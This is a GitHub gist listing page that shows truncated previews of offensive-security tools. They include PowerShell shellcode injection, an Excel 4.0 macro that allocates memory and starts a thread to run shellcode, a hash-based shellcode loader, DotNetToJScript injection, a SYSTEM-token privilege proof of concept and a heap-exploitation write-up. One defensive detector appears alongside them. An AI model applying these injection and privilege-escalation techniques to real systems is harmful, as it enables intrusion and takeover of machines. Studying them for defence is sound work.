- Disclamair
- House Of Roman
------> 2.1 Assumptions
------> 2.2 Protections
------> 2.3 Quick Walkthrough
------> 2.4 Setting the FD to malloc_hook
------> 2.5 Fixing the 0x71 freelist
------> 2.6 Unsorted Bin attack on malloc_hook
Ashish Gahlot Agahlot
Agahlot
/ Invoke-Shellcode.ps1
Last active
July 29, 2019 08:22
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-Shellcode | |
| { | |
| <# | |
| .SYNOPSIS | |
| Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process. | |
| PowerSploit Function: Invoke-Shellcode | |
| Author: Matthew Graeber (@mattifestation) | |
| License: BSD 3-Clause |
Agahlot
/ shellcode.xlsm
Created
May 28, 2019 14:23
— forked from Arno0x/shellcode.xlsm
XLM (Excel 4.0 macro) to execute a shellcode into Excel (32 bits) - French Macro code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Once Excel is opened, click on the active tab, select "Insert" then "Macro MS Excel 4.0". | |
| ================================================================================ | |
| Paste this in cells in column A, starting in cell A1: | |
| ================================================================================ | |
| =REGISTRE("Kernel32";"VirtualAlloc";"JJJJJ";"VAlloc";;1;9) | |
| =REGISTRE("Kernel32";"WriteProcessMemory";"JJJCJJ";"WProcessMemory";;1;9) | |
| =REGISTRE("Kernel32";"CreateThread";"JJJJJJJ";"CThread";;1;9) | |
| =VAlloc(0;4096;4096;64) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <img id="HoneyBadger" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABAAAAAKtCAIAAAA2LYveAAAACXBIWXMAAA7zAAAO8wEcU5k6AAAAEXRFWHRUaXRsZQBQREYgQ3JlYXRvckFevCgAAAATdEVYdEF1dGhvcgBQREYgVG9vbHMgQUcbz3cwAAAALXpUWHREZXNjcmlwdGlvbgAACJnLKCkpsNLXLy8v1ytISdMtyc/PKdZLzs8FAG6fCPGXryy4AAovrklEQVR42ty9i5bjSJIsFgGAZGZWVnX1vFa60tmj/z/6CR19ymp1R3dmerrrkZl8ACFztwiH40kwM6tnJW5PLZMEgXghYO5ubh7/z//jfw8hxOELn1RVFeZedZBvU0r2iX8/ffFs09fSr6qY1o+fXLqz9/yK/3ZdZ+8H/3Yn+9NeK5eIYTfbWfbLfm7dvHQt39tI2ldx8uL5l8Z/cFg5Cfu1MBRz81Kt9W7uPNG3x/d0dl7asDb76/M4bfP0yLbM49Jho3a2C+ttaR0uvTDO/if9RLcd3nT6Gk3c7Hl27vM4eT9dnzzlaApWzhAXzs8/67qu9GVfHbt73Nl1HSv8l7q2O3btpW3P6A5WirShi2WkZQdomtPsDdK27agB/PZY53VbxUav3OjVK/7ZNHv8o8s+H3Zpa54BDcA5bXnjYH9z8b1OyvPlcsF7fti2id3UraPe6atpGn6FI4/P3/EnD8D5tUfywq9affFU1oUmHvNC0hdbUsurmV9XOhQ8Unpdc6m0bD+6Jf/Grp/xC4elYpfxwsHlXN1wPejnqSlLBWfBDFW4QVOsOu7DEbPI3kXsPDjb8dxyQPDv+Xw+nS7YsXe7g05nbJrdfr9v6n3u/uXy9PKNS/3u7u5wOKCvGDR88/z8HEOtUyYvncQaDau6c3kSVFxdsmGkqk3dk77w+ePj44cPH5qd7JzpdNQ+5hfOjFbhX1xOxrSRUcUnuNzxeMSlcSg+5ySi |
Agahlot
/ Get-Doppelgangers.ps1
Created
November 30, 2018 11:22
— forked from dezhub/Get-Doppelgangers.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-Doppelgangers | |
| { | |
| <# | |
| .SYNOPSIS | |
| Detects use of NTFS transactions for stealth/evasion, aka 'Process Doppelganging' | |
| Author: Joe Desimone (@dez_) | |
| License: BSD 3-Clause | |
Agahlot
/ Build_In_Memory_CSharp_Project.txt
Created
October 9, 2018 02:51
— forked from bohops/Build_In_Memory_CSharp_Project.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-) | |
| These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs. | |
| Basic gist after running PS script statements: | |
| - Loads C# project from file or web URL | |
| - Create various tmp files | |
| - Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"] | |
| - Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"] |
Agahlot
/ getsystem_parent.cpp
Created
October 8, 2018 06:19
— forked from xpn/getsystem_parent.cpp
A POC to grab SYSTEM token privileges via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) { | |
| TOKEN_PRIVILEGES tp; | |
| LUID luid; | |
| TOKEN_PRIVILEGES tpPrevious; | |
| DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES); | |
| if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <Windows.h> | |
| #include <winternl.h> | |
| #include <wchar.h> | |
| #include <tlhelp32.h> | |
| PPEB get_peb(void); | |
| DWORD __stdcall unicode_ror13_hash(const WCHAR *unicode_string); | |
| DWORD __stdcall ror13_hash(const char *string); | |
| HMODULE __stdcall find_module_by_hash(DWORD hash); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| public class TestClass | |
| { | |
| public TestClass() | |
| {} |
Agahlot
/ Inject.cs
Created
August 30, 2018 08:00
— forked from jackson5sec/Inject.cs
DotNetToJScript Build Walkthrough
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| public class TestClass | |
| { | |
| public TestClass() | |
| {} |
Agahlot
/ House_of_Roman.md
Created
May 2, 2018 17:46
— forked from romanking98/House_of_Roman.md
NewerOlder